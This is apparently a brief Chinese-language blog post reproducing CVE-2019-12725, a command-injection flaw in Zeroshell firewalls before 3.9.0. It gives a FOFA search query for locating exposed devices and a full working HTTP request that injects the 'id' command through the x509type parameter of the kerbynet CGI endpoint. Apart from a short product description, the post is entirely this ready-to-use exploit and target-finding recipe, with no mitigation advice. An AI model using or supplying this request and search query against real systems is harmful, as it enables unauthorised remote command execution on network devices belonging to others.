某防火墙命令执行复现

Posted 2021-05-24 蓝银花

漏洞介绍：

ZoreShell防火墙版本小于3.9.0存在命令执行（CVE-2019-12725），Zeroshell是一个微型的linux发行版本，它功能强大，具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能，可以用来安装到服务器上为内网提供网络服务。

 

FOFA语法：

app="Zeroshell-防火墙"

 

复现poc

1 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1
2 Host: xxxxxxxx
3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 Connection: close
7 Upgrade-Insecure-Requests: 1
8 Cache-Control: max-age=0

 

数据包修改